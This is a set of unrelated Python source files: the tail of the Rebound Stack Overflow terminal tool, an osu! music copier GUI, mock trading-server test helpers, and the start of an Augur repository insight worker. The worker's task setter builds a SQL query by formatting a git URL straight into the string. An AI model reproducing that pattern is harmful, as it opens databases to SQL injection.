error.split('\n'): # Multiple error formats m = re.search(r'.*(Exception|Error):(.*)', line) if m and m.group(2): return m.group(2) m = re.search(r'Exception in thread ".*" (.*)', line) if m and m.group(1): return m.group(1) return None ################# ## FILE EXECUTION ################# ## Helper Functions ## def read(pipe, funcs): """Reads and pushes piped output to a shared queue and appropriate lists.""" for line in iter(pipe.readline, b''): for func in funcs: func(line.decode("utf-8")) pipe.close() def write(get): """Pulls output from shared queue and prints to terminal.""" for line in iter(get, None): sys.stdout.write(line) ## Main ## def execute(command): """Executes a given command and clones stdout/err to both variables and the terminal (in real-time).""" process = Popen( command, cwd=None, shell=False, close_fds=True, stdout=PIPE, stderr=PIPE, bufsize=1 ) output, errors = [], [] pipe_queue = Queue() # Wowee, thanks CS 225 # Threads for reading stdout and stderr pipes and pushing to a shared queue stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append])) stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append])) writer_thread = Thread(target=write, args=(pipe_queue.get,)) # Thread for printing items in the queue # Spawns each thread for thread in (stdout_thread, stderr_thread, writer_thread): thread.daemon = True thread.start() process.wait() for thread in (stdout_thread, stderr_thread): thread.join() pipe_queue.put(None) output = ' '.join(output) errors = ' '.join(errors) if "java" != command[0] and not os.path.isfile(command[1]): # File doesn't exist, for java, command[1] is a class name instead of a file return (None, None) else: return (output, errors) ############### ## WEB SCRAPING ############### ## Helper Functions ## def stylize_code(soup): """Identifies and stylizes code in a question or answer.""" # TODO: Handle blockquotes and markdown stylized_text = [] code_blocks = [block.get_text() for block in soup.find_all("code")] blockquotes = [block.get_text() for block in soup.find_all("blockquote")] newline = False for child in soup.recursiveChildGenerator(): name = getattr(child, "name", None) if name is None: # Leaf (terminal) node if child in code_blocks: if newline: # Code block #if code_blocks.index(child) == len(code_blocks) - 1: # Last code block #child = child[:-1] stylized_text.append(("code", u"\n%s" % str(child))) newline = False else: # In-line code stylized_text.append(("code", u"%s" % str(child))) else: # Plaintext newline = child.endswith('\n') stylized_text.append(u"%s" % str(child)) if type(stylized_text[-2]) == tuple: # Remove newline from questions/answers that end with a code block if stylized_text[-2][1].endswith('\n'): stylized_text[-2] = ("code", stylized_text[-2][1][:-1]) return urwid.Text(stylized_text) def get_search_results(soup): """Returns a list of dictionaries containing each search result.""" search_results = [] for result in soup.find_all("div", class_="question-summary search-result"): title_container = result.find_all("div", class_="result-link")[0].find_all("span")[0].find_all("a")[0] if result.find_all("div", class_="status answered") != []: # Has answers answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text) elif result.find_all("div", class_="status answered-accepted") != []: # Has an accepted answer (closed) answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text) else: # No answers answer_count = 0 search_results.append({ "Title": title_container["title"], #"Body": result.find_all("div", class_="excerpt")[0].text, #"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text), "Answers": answer_count, "URL": SO_URL + title_container["href"] }) return search_results def souper(url): """Turns a given URL into a BeautifulSoup object.""" try: html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)}) except requests.exceptions.RequestException: sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. " "Please check that you are connected to the internet.\n", END)) sys.exit(1) if re.search("\.com/nocaptcha", html.url): # URL is a captcha page return None else: return BeautifulSoup(html.text, "html.parser") ## Main ## def search_stackoverflow(query): """Wrapper function for get_search_results.""" soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+')) # TODO: Randomize the user agent if soup == None: return (None, True) else: return (get_search_results(soup), False) def get_question_and_answers(url): """Returns details about a given question and list of its answers.""" soup = souper(url) if soup == None: # Captcha page return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", "" else: question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text() question_stats = soup.find_all("span", class_="vote-count-post")[0].get_text() # Vote count try: question_stats = question_stats + " Votes | " + '|'.join((((soup.find_all("div", class_="module question-stats")[0].get_text()) .replace('\n', ' ')).replace(" ", " | ")).split('|')[:2]) # Vote count, submission date, view count except IndexError: question_stats = "Could not load statistics." question_desc = stylize_code(soup.find_all("div", class_="post-text")[0]) # TODO: Handle duplicates question_stats = ' '.join(question_stats.split()) answers = [stylize_code(answer) for answer in soup.find_all("div", class_="post-text")][1:] if len(answers) == 0: answers.append(urwid.Text(("no answers", u"\nNo answers for this question."))) return question_title, question_desc, question_stats, answers ############ ## INTERFACE ############ ## Helper Classes ## class Scrollable(urwid.WidgetDecoration): # TODO: Fix scrolling behavior (works with up/down keys, not with cursor) def sizing(self): return frozenset([BOX,]) def selectable(self): return True def __init__(self, widget): """Box widget (wrapper) that makes a fixed or flow widget vertically scrollable.""" self._trim_top = 0 self._scroll_action = None self._forward_keypress = None self._old_cursor_coords = None self._rows_max_cached = 0 self._rows_max_displayable = 0 self.__super.__init__(widget) def render(self, size, focus=False): maxcol, maxrow = size # Render complete original widget ow = self._original_widget ow_size = self._get_original_widget_size(size) canv = urwid.CompositeCanvas(ow.render(ow_size, focus)) canv_cols, canv_rows = canv.cols(), canv.rows() if canv_cols <= maxcol: pad_width = maxcol - canv_cols if pad_width > 0: # Canvas is narrower than available horizontal space canv.pad_trim_left_right(0, pad_width) if canv_rows <= maxrow: fill_height = maxrow - canv_rows if fill_height > 0: # Canvas is lower than available vertical space canv.pad_trim_top_bottom(0, fill_height) self._rows_max_displayable = maxrow if canv_cols <= maxcol and canv_rows <= maxrow: # Canvas is small enough to fit without trimming return canv self._adjust_trim_top(canv, size) # Trim canvas if necessary trim_top = self._trim_top trim_end = canv_rows - maxrow - trim_top trim_right = canv_cols - maxcol if trim_top > 0: canv.trim(trim_top) if trim_end > 0: canv.trim_end(trim_end) if trim_right > 0: canv.pad_trim_left_right(0, -trim_right) # Disable cursor display if cursor is outside of visible canvas parts if canv.cursor is not None: curscol, cursrow = canv.cursor if cursrow >= maxrow or cursrow < 0: canv.cursor = None # Let keypress() know if original_widget should get keys self._forward_keypress = bool(canv.cursor) return canv def keypress(self, size, key): if self._forward_keypress: ow = self._original_widget ow_size = self._get_original_widget_size(size) # Remember previous cursor position if possible if hasattr(ow, "get_cursor_coords"): self._old_cursor_coords = ow.get_cursor_coords(ow_size) key = ow.keypress(ow_size, key) if key is None: return None # Handle up/down, page up/down, etc command_map = self._command_map if command_map[key] == urwid.CURSOR_UP: self._scroll_action = SCROLL_LINE_UP elif command_map[key] == urwid.CURSOR_DOWN: self._scroll_action = SCROLL_LINE_DOWN elif command_map[key] == urwid.CURSOR_PAGE_UP: self._scroll_action = SCROLL_PAGE_UP elif command_map[key] == urwid.CURSOR_PAGE_DOWN: self._scroll_action = SCROLL_PAGE_DOWN elif command_map[key] == urwid.CURSOR_MAX_LEFT: # "home" self._scroll_action = SCROLL_TO_TOP elif command_map[key] == urwid.CURSOR_MAX_RIGHT: # "end" self._scroll_action = SCROLL_TO_END else: return key self._invalidate() def mouse_event(self, size, event, button, col, row, focus): ow = self._original_widget if hasattr(ow, "mouse_event"): ow_size = self._get_original_widget_size(size) row += self._trim_top return ow.mouse_event(ow_size, event, button, col, row, focus) else: return False def _adjust_trim_top(self, canv, size): """Adjust self._trim_top according to self._scroll_action""" action = self._scroll_action self._scroll_action = None maxcol, maxrow = size trim_top = self._trim_top canv_rows = canv.rows() if trim_top < 0: # Negative trim_top values use bottom of canvas as reference trim_top = canv_rows - maxrow + trim_top + 1 if canv_rows <= maxrow: self._trim_top = 0 # Reset scroll position return def ensure_bounds(new_trim_top): return max(0, min(canv_rows - maxrow, new_trim_top)) if action == SCROLL_LINE_UP: self._trim_top = ensure_bounds(trim_top - 1) elif action == SCROLL_LINE_DOWN: self._trim_top = ensure_bounds(trim_top + 1) elif action == SCROLL_PAGE_UP: self._trim_top = ensure_bounds(trim_top - maxrow+1) elif action == SCROLL_PAGE_DOWN: self._trim_top = ensure_bounds(trim_top + maxrow-1) elif action == SCROLL_TO_TOP: self._trim_top = 0 elif action == SCROLL_TO_END: self._trim_top = canv_rows - maxrow else: self._trim_top = ensure_bounds(trim_top) if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor: self._old_cursor_coords = None curscol, cursrow = canv.cursor if cursrow < self._trim_top: self._trim_top = cursrow elif cursrow >= self._trim_top + maxrow: self._trim_top = max(0, cursrow - maxrow + 1) def _get_original_widget_size(self, size): ow = self._original_widget sizing = ow.sizing() if FIXED in sizing: return () elif FLOW in sizing: return (size[0],) def get_scrollpos(self, size=None, focus=False): return self._trim_top def set_scrollpos(self, position): self._trim_top = int(position) self._invalidate() def rows_max(self, size=None, focus=False): if size is not None: ow = self._original_widget ow_size = self._get_original_widget_size(size) sizing = ow.sizing() if FIXED in sizing: self._rows_max_cached = ow.pack(ow_size, focus)[1] elif FLOW in sizing: self._rows_max_cached = ow.rows(ow_size, focus) else: raise RuntimeError("Not a flow/box widget: %r" % self._original_widget) return self._rows_max_cached @property def scroll_ratio(self): return self._rows_max_cached / self._rows_max_displayable class ScrollBar(urwid.WidgetDecoration): # TODO: Change scrollbar size and color(?) def sizing(self): return frozenset((BOX,)) def selectable(self): return True def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ', side=SCROLLBAR_RIGHT, width=1): """Box widget that adds a scrollbar to `widget`.""" self.__super.__init__(widget) self._thumb_char = thumb_char self._trough_char = trough_char self.scrollbar_side = side self.scrollbar_width = max(1, width) self._original_widget_size = (0, 0) self._dragging = False def render(self, size, focus=False): maxcol, maxrow = size ow = self._original_widget ow_base = self.scrolling_base_widget ow_rows_max = ow_base.rows_max(size, focus) if ow_rows_max <= maxrow: # Canvas fits without scrolling - no scrollbar needed self._original_widget_size = size return ow.render(size, focus) sb_width = self._scrollbar_width self._original_widget_size = ow_size = (maxcol-sb_width, maxrow) ow_canv = ow.render(ow_size, focus) pos = ow_base.get_scrollpos(ow_size, focus) posmax = ow_rows_max - maxrow # Thumb shrinks/grows according to the ratio of # <number of visible lines> / <number of total lines> thumb_weight = min(1, maxrow / max(1, ow_rows_max)) thumb_height = max(1, round(thumb_weight * maxrow)) # Thumb may only touch top/bottom if the first/last row is visible top_weight = float(pos) / max(1, posmax) top_height = int((maxrow-thumb_height) * top_weight) if top_height == 0 and top_weight > 0: top_height = 1 # Bottom part is remaining space bottom_height = maxrow - thumb_height - top_height assert thumb_height + top_height + bottom_height == maxrow # Create scrollbar canvas top = urwid.SolidCanvas(self._trough_char, sb_width, top_height) thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height) bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height) sb_canv = urwid.CanvasCombine([ (top, None, False), (thumb, None, False), (bottom, None, False), ]) combinelist = [(ow_canv, None, True, ow_size[0]), (sb_canv, None, False, sb_width)] if self._scrollbar_side != SCROLLBAR_LEFT: return urwid.CanvasJoin(combinelist) else: return urwid.CanvasJoin(reversed(combinelist)) @property def scrollbar_width(self): return max(1, self._scrollbar_width) @scrollbar_width.setter def scrollbar_width(self, width): self._scrollbar_width = max(1, int(width)) self._invalidate() @property def scrollbar_side(self): return self._scrollbar_side @scrollbar_side.setter def scrollbar_side(self, side): if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT): raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side) self._scrollbar_side = side self._invalidate() @property def scrolling_base_widget(self): """Nearest `base_widget` that is compatible with the scrolling API.""" def orig_iter(w): while hasattr(w, "original_widget"): w = w.original_widget yield w yield w def is_scrolling_widget(w): return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max") for w in orig_iter(self): if is_scrolling_widget(w): return w @property def scrollbar_column(self): if self.scrollbar_side == SCROLLBAR_LEFT: return 0 if self.scrollbar_side == SCROLLBAR_RIGHT: return self._original_widget_size[0] def keypress(self, size, key): return self._original_widget.keypress(self._original_widget_size, key) def mouse_event(self, size, event, button, col, row, focus): ow = self._original_widget ow_size = self._original_widget_size handled = False if hasattr(ow, "mouse_event"): handled = ow.mouse_event(ow_size, event, button, col, row, focus) if not handled and hasattr(ow, "set_scrollpos"): if button == 4: # Scroll wheel up pos = ow.get_scrollpos(ow_size) if pos > 0: ow.set_scrollpos(pos - 1) return True elif button == 5: # Scroll wheel down pos = ow.get_scrollpos(ow_size) ow.set_scrollpos(pos + 1) return True elif col == self.scrollbar_column: ow.set_scrollpos(int(row*ow.scroll_ratio)) if event == "mouse press": self._dragging = True elif event == "mouse release": self._dragging = False elif self._dragging: ow.set_scrollpos(int(row*ow.scroll_ratio)) if event == "mouse release": self._dragging = False return False class SelectableText(urwid.Text): def selectable(self): return True def keypress(self, size, key): return key ## Helper Functions ## def interleave(a, b): result = [] while a and b: result.append(a.pop(0)) result.append(b.pop(0)) result.extend(a) result.extend(b) return result ## Main ## class App(object): def __init__(self, search_results): self.search_results, self.viewing_answers = search_results, False self.palette = [ ("title", "light cyan,bold", "default", "standout"), ("stats", "light green", "default", "standout"), ("menu", "black", "light cyan", "standout"), ("reveal focus", "black", "light cyan", "standout"), ("no answers", "light red", "default", "standout"), ("code", "brown", "default", "standout") ] self.menu = urwid.Text([ u'\n', ("menu", u" ENTER "), ("light gray", u" View answers "), ("menu", u" B "), ("light gray", u" Open browser "), ("menu", u" Q "), ("light gray", u" Quit"), ]) results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute content = urwid.SimpleListWalker(results) self.content_container = urwid.ListBox(content) layout = urwid.Frame(body=self.content_container, footer=self.menu) self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input) self.original_widget = self.main_loop.widget self.main_loop.run() def _handle_input(self, input): if input == "enter": # View answers url = self._get_selected_link() if url != None: self.viewing_answers = True question_title, question_desc, question_stats, answers = get_question_and_answers(url) pile = urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] + interleave(answers, [urwid.Divider('-')] * (len(answers) - 1))) padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2))) #filler = urwid.Filler(padding, valign="top") linebox = urwid.LineBox(padding) menu = urwid.Text([ u'\n', ("menu", u" ESC "), ("light gray", u" Go back "), ("menu", u" B "), ("light gray", u" Open browser "), ("menu", u" Q "), ("light gray", u" Quit"), ]) self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu) elif input in ('b', 'B'): # Open link url = self._get_selected_link() if url != None: webbrowser.open(url) elif input == "esc": # Close window if self.viewing_answers: self.main_loop.widget = self.original_widget self.viewing_answers = False else: raise urwid.ExitMainLoop() elif input in ('q', 'Q'): # Quit raise urwid.ExitMainLoop() def _get_selected_link(self): focus_widget, idx = self.content_container.get_focus() # Gets selected item title = focus_widget.base_widget.text for result in self.search_results: if title == self._stylize_title(result): # Found selected title's search_result dict return result["URL"] def _stylize_title(self, search_result): if search_result["Answers"] == 1: return "%s (1 Answer)" % search_result["Title"] else: return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"]) def _stylize_question(self, title, desc, stats): new_title = urwid.Text(("title", u"%s" % title)) new_stats = urwid.Text(("stats", u"%s\n" % stats)) return [new_title, desc, new_stats] ####### ## MAIN ####### ## Helper Functions ## def confirm(question): """Prompts a given question and handles user input.""" valid = {"yes": True, 'y': True, "ye": True, "no": False, 'n': False, '': True} prompt = " [Y/n] " while True: sys.stdout.write(BOLD + CYAN + question + prompt + END) choice = input().lower() if choice in valid: return valid[choice] sys.stdout.write("Please respond with 'yes' or 'no' (or 'y' or 'n').\n") def print_help(): """Prints usage instructions.""" sys.stdout.write("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END)) sys.stdout.write("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.") sys.stdout.write("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END)) sys.stdout.write("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END)) sys.stdout.write("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END)) sys.stdout.write("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END)) ## Main ## def main(): if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help": print_help() elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query": query = ' '.join(sys.argv[2:]) search_results, captcha = search_stackoverflow(query) if search_results != []: if captcha: sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END)) return else: App(search_results) # Opens interface else: sys.stdout.write("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END)) else: language = get_language(sys.argv[1].lower()) # Gets the language name if language == '': # Unknown language sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END)) return file_path = sys.argv[1:] if language == 'java': file_path = [f.replace('.class', '') for f in file_path] output, error = execute([language] + file_path) # Compiles the file and pipes stdout if (output, error) == (None, None): # Invalid file return error_msg = get_error_message(error, language) # Prepares error message for search if error_msg != None: language = 'java' if language == 'javac' else language # Fix language compiler command query = "%s %s" % (language, error_msg) search_results, captcha = search_stackoverflow(query) if search_results != []: if captcha: sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END)) return elif confirm("\nDisplay Stack Overflow results?"): App(search_results) # Opens interface else: sys.stdout.write("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END)) else: sys.stdout.write("\n%s%s%s" % (CYAN, "No error detected :)\n", END)) return if __name__ == "__main__": main()
osu_music_copier.py
import ctypes import platform import sys import tkinter import webbrowser from queue import Queue from threading import Thread from tkinter import Text, filedialog, ttk from copier_process import copy # osu! Music Copierのリポジトリを開く def openRepository(event): webbrowser.open("https://github.com/ReNeeter/osu-Music-Copier") # Aboutを表示 def showAbout(): aboutDialog = tkinter.Toplevel(mainRoot) aboutDialog.grab_set() aboutDialog.resizable(False, False) aboutDialog.title("About") aboutFrame = ttk.Frame(aboutDialog) aboutNameLabel = ttk.Label(aboutFrame, text="osu! Music Copier", font=("", 15)) aboutVerLabel = ttk.Label(aboutFrame, text="ver.2.0") aboutAuthorLabel = ttk.Label(aboutFrame, text="作者: ReNeeter") aboutLinkLabel = ttk.Label( aboutFrame, text="https://github.com/ReNeeter/osu-Music-Copier", foreground="#0000EE", ) aboutLinkLabel.bind( "<1>", openRepository, ) aboutFrame.pack() aboutNameLabel.pack(pady=(10, 5)) aboutVerLabel.pack() aboutAuthorLabel.pack() aboutLinkLabel.pack(padx=10, pady=(0, 10)) # ディレクトリ選択ダイアログを表示 def showDirSelect(setEntry): selectDir = filedialog.askdirectory() if selectDir: setEntry.delete(0, "end") setEntry.insert(0, selectDir) # 処理を開始 def runCopy(): global copyThread # FIXME copyThread = Thread( target=copy, args=( osuSongsPathEntry.get(), copyPathEntry.get(), isAddTagCheckButtonChecked.get(), isRenameCheckButtonChecked.get(), threadQueue, ), ) copyThread.daemon = True copyThread.start() # 進捗状況を表示 def showProgress(): global progressDialog # FIXME progressDialog = tkinter.Toplevel(mainRoot) progressDialog.protocol("WM_DELETE_WINDOW", lambda: "break") progressDialog.grab_set() progressDialog.resizable(False, False) progressDialog.title("進捗状況") progressFrame = ttk.Frame(progressDialog) progressNameLabel = ttk.Label(progressFrame, text="進捗状況", font=("", 15)) global progressConsoleBox # FIXME progressConsoleBox = Text(progressFrame) progressConsoleBox.bind("<Key>", lambda e: "break") progressBar = ttk.Progressbar(progressFrame, mode="indeterminate", length=800) progressFrame.pack() progressNameLabel.pack(padx=10, pady=10) progressConsoleBox.pack() progressBar.pack(padx=10, pady=10) progressBar.start(15) queueThread = Thread(target=getQueue) queueThread.daemon = True queueThread.start() # キューを取得 def getQueue(): progressConsoleBox.insert("end", threadQueue.get() + "\n") if not threadQueue.get(): progressDialog.destroy() sys.exit() if isAddTagCheckButtonChecked.get(): progressConsoleBox.insert("end", threadQueue.get() + "\n") if isRenameCheckButtonChecked.get(): progressConsoleBox.insert("end", threadQueue.get() + "\n") copyThread.join() progressDialog.destroy() # Tkinterを設定 if platform.system() == "Windows": ctypes.windll.shcore.SetProcessDpiAwareness(True) mainRoot = tkinter.Tk() mainRoot.resizable(False, False) mainRoot.title("osu! Music Copier") mainMenu = tkinter.Menu(mainRoot) mainMenu.add_command(label="About", command=showAbout) mainRoot.config(menu=mainMenu) mainFrame = ttk.Frame(mainRoot) osuSongsPathLabel = ttk.Label(mainFrame, text="osu!のSongsフォルダのパス") osuSongsPathEntry = ttk.Entry(mainFrame, width=80) osuSongsPathBrowseButton = ttk.Button( mainFrame, text="参照…", command=lambda: showDirSelect(osuSongsPathEntry) ) copyPathLabel = ttk.Label(mainFrame, text="音楽ファイルのコピー先のパス") copyPathEntry = ttk.Entry(mainFrame, width=80) copyPathBrowseButton = ttk.Button( mainFrame, text="参照…", command=lambda: showDirSelect(copyPathEntry) ) isAddTagCheckButtonChecked = tkinter.BooleanVar(value=True) isAddTagCheckButton = ttk.Checkbutton( mainFrame, text="コピー後に譜面から音楽ファイルの情報を読み取りタグ付けする\n(このオプションはコピーした音楽ファイルがID3形式の場合のみ機能します。\n既存のタグは上書きされます。)", variable=isAddTagCheckButtonChecked, ) isRenameCheckButtonChecked = tkinter.BooleanVar(value=True) isRenameCheckButton = ttk.Checkbutton( mainFrame, text="コピー後にファイル名を曲名にリネームする", variable=isRenameCheckButtonChecked, ) threadQueue = Queue() copyStartButton = ttk.Button( mainFrame, text="コピー", command=lambda: [ runCopy(), showProgress(), ], ) mainFrame.pack() osuSongsPathLabel.grid(row=0, column=0, padx=10, pady=10) osuSongsPathEntry.grid(row=0, column=1, padx=10, pady=10) osuSongsPathBrowseButton.grid(row=0, column=2, padx=10, pady=10) copyPathLabel.grid(row=1, column=0, padx=10, pady=10) copyPathEntry.grid(row=1, column=1, padx=10, pady=10) copyPathBrowseButton.grid(row=1, column=2, padx=10, pady=10) isAddTagCheckButton.grid(row=2, column=0, columnspan=3, padx=10, pady=10) isRenameCheckButton.grid(row=3, column=0, columnspan=3, padx=10, pady=10) copyStartButton.grid(row=4, column=0, columnspan=3, padx=10, pady=10) mainRoot.mainloop()
helper.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import lzma import threading import asyncio import websockets from aiohttp import web class MockInsServer(): def __init__(self, port): self.loop = asyncio.new_event_loop() self.port = port self.thread = threading.Thread(target=self._run) self.thread.start() self.stop_signal = self.loop.create_future() def close(self): self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0)) self.thread.join() async def handle(self, request): data = { "SHFE.cu1901": { "class": "FUTURE", "instrument_id": "SHFE.cu1901", "exchange_id": "SHFE", "ins_id": "cu1901", "ins_name": "\u6caa\u94dc1901", "volume_multiple": 5, "price_tick": 10, "price_decs": 0, "sort_key": 20, "expired": True, "py": "ht,hutong,yinjitong", "product_id": "cu", "product_short_name": "\u6caa\u94dc", "delivery_year": 2019, "delivery_month": 1, "expire_datetime": 1547535600.0, "last_price": 46940.0, "pre_volume": 0, "open_interest": 0, "settlement_price": 46880.0, "max_market_order_volume": 0, "max_limit_order_volume": 500, "margin": 16247.0, "commission": 11.605, "mmsa": 1, "trading_time": { "day": [["09:00:00", "10:15:00"], ["10:30:00", "11:30:00"], ["13:30:00", "15:00:00"]], "night": [["21:00:00", "25:00:00"]] } } } return web.json_response(data) async def task_serve(self): app = web.Application() app.add_routes([web.get('/{tail:.*}', self.handle)]) runner = web.AppRunner(app) await runner.setup() site = web.TCPSite(runner, '127.0.0.1', self.port) await site.start() await self.stop_signal await runner.cleanup() def _run(self): asyncio.set_event_loop(self.loop) self.loop.run_until_complete(self.task_serve()) class MockServer(): def __init__(self): self.loop = asyncio.new_event_loop() self.connections = {} self.server_md = None self.server_td = None self.md_port = 5100 self.td_port = 5200 self._expecting = {} self.stop_signal = self.loop.create_future() def close(self): assert not self._expecting self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0)) self.thread.join() async def _handler_md(self, connection, path): await self.on_connected("md", connection) try: while True: s = await self.connections["md"].recv() pack = json.loads(s) await self.on_received("md", pack) except websockets.exceptions.ConnectionClosedOK as e: assert e.code == 1000 async def _handler_td(self, connection, path): await self.on_connected("td", connection) while True: s = await self.connections["td"].recv() pack = json.loads(s) if pack["aid"] == "peek_message": continue await self.on_received("td", pack) def run(self, script_file_name): self.script_file_name = script_file_name self.thread = threading.Thread(target=self._run) self.thread.start() async def _server(self): async with websockets.serve(self._handler_md, "127.0.0.1", self.md_port) as self.server_md: async with websockets.serve(self._handler_td, "127.0.0.1", self.td_port) as self.server_td: await self.stop_signal def _run(self): if str.endswith(self.script_file_name, "lzma"): self.script_file = lzma.open(self.script_file_name, "rt", encoding="utf-8") else: # 用于本地script还未压缩成lzma文件时运行测试用例 self.script_file = open(self.script_file_name, "rt", encoding="utf-8") asyncio.set_event_loop(self.loop) self.loop.run_until_complete(self._server()) async def _process_script(self): # 每次处理日志文件中的一行, 直至需要输入为止 self._expecting = {} for line in self.script_file: # 2019-09-09 16:22:40,652 - DEBUG - websocket message sent to wss://openmd.shinnytech.com/t/md/front/mobile: {"aid": "subscribe_quote", item = {} if "websocket message sent" in line and "peek_message" not in line: # 在api角度的sent item["type"] = "sent" elif "websocket message received" in line: # 在api角度的received item["type"] = "received" else: continue if "openmd" in line: item["source"] = "md" elif "opentd" in line: item["source"] = "td" else: raise Exception() content_start_pos = line.find("{") content = line[content_start_pos:] item["content"] = json.loads(content) if item["type"] == "sent": self._expecting = item break elif item["type"] == "received": msg = json.dumps(item["content"]) assert self.connections[item["source"]] await self.connections[item["source"]].send(msg) async def on_connected(self, source, connection): self.connections[source] = connection # self._process_script() # assert self._expecting["source"] == source # assert self._expecting["action"] == "connected" async def on_received(self, source, pack): if not self._expecting: await self._process_script() if pack["aid"] != "peek_message": assert self._expecting["source"] == source assert self._expecting["content"] == pack await self._process_script()
worker.py
from multiprocessing import Process, Queue from urllib.parse import urlparse import requests import pandas as pd import sqlalchemy as s from sqlalchemy.ext.automap import automap_base from sqlalchemy import MetaData, and_ import statistics, logging, os, json, time import numpy as np import scipy.stats import datetime def dump_queue(queue): """ Empties all pending items in a queue and returns them in a list. """ result = [] queue.put("STOP") for i in iter(queue.get, 'STOP'): result.append(i) # time.sleep(.1) return result class InsightWorker: """ Worker that collects data from the Github API and stores it in our database task: most recent task the broker added to the worker's queue child: current process of the queue being ran queue: queue of tasks to be fulfilled config: holds info like api keys, descriptions, and database connection strings """ def __init__(self, config, task=None): self.config = config logging.basicConfig(filename='worker_{}.log'.format(self.config['id'].split('.')[len(self.config['id'].split('.')) - 1]), filemode='w', level=logging.INFO) logging.info('Worker (PID: {}) initializing...'.format(str(os.getpid()))) self._task = task self._child = None self._queue = Queue() self.db = None self.tool_source = 'Insight Worker' self.tool_version = '0.0.2' # See __init__.py self.data_source = 'Augur API' self.refresh = True self.send_insights = True self.finishing_task = False logging.info("Worker initializing...") specs = { "id": self.config['id'], "location": self.config['location'], "qualifications": [ { "given": [["git_url"]], "models":["insights"] } ], "config": [self.config] } self.metric_results_counter = 0 self.insight_results_counter = 0 """ Connect to GHTorrent :param dbstr: The [database string](http://docs.sqlalchemy.org/en/latest/core/engines.html) to connect to the GHTorrent database """ self.DB_STR = 'postgresql://{}:{}@{}:{}/{}'.format( self.config['user'], self.config['password'], self.config['host'], self.config['port'], self.config['database'] ) dbschema='augur_data' # Searches left-to-right self.db = s.create_engine(self.DB_STR, poolclass=s.pool.NullPool, connect_args={'options': '-csearch_path={}'.format(dbschema)}) helper_schema = 'augur_operations' self.helper_db = s.create_engine(self.DB_STR, poolclass = s.pool.NullPool, connect_args={'options': '-csearch_path={}'.format(helper_schema)}) # produce our own MetaData object metadata = MetaData() helper_metadata = MetaData() # we can reflect it ourselves from a database, using options # such as 'only' to limit what tables we look at... metadata.reflect(self.db, only=['chaoss_metric_status', 'repo_insights', 'repo_insights_records']) helper_metadata.reflect(self.helper_db, only=['worker_history', 'worker_job']) # we can then produce a set of mappings from this MetaData. Base = automap_base(metadata=metadata) HelperBase = automap_base(metadata=helper_metadata) # calling prepare() just sets up mapped classes and relationships. Base.prepare() HelperBase.prepare() # mapped classes are ready self.chaoss_metric_status_table = Base.classes['chaoss_metric_status'].__table__ self.repo_insights_table = Base.classes['repo_insights'].__table__ self.repo_insights_records_table = Base.classes['repo_insights_records'].__table__ self.history_table = HelperBase.classes.worker_history.__table__ self.job_table = HelperBase.classes.worker_job.__table__ requests.post('http://{}:{}/api/unstable/workers'.format( self.config['broker_host'],self.config['broker_port']), json=specs) #hello message def update_config(self, config): """ Method to update config and set a default """ self.config = { 'database_connection_string': 'psql://{}:5432/augur'.format(self.config['broker_host']), "display_name": "", "description": "", "required": 1, "type": "string" } self.config.update(config) @property def task(self): """ Property that is returned when the worker's current task is referenced """ return self._task @task.setter def task(self, value): """ entry point for the broker to add a task to the queue Adds this task to the queue, and calls method to process queue """ repo_git = value['given']['git_url'] """ Query all repos """ repoUrlSQL = s.sql.text(""" SELECT repo_id, repo_group_id FROM repo WHERE repo_git = '{}' """.format(repo_git)) rs = pd.read_sql(repoUrlSQL, self.db, params={}) try: self._queue.put({"git_url": repo_git, "repo_id": int(rs.iloc[0]["repo_id"]), "repo_group_id": int(rs.iloc[0]["repo_group_id"]), "job_type": value['job_type']}) except Exception as e: logging.info("that repo is not in our database, {}".format(e)) if self._queue.empty(): if 'github.com' in repo_git: self._task = value self.run() def cancel(self): """ Delete/cancel current task """ self._task = None def run(self): """ Kicks off the processing 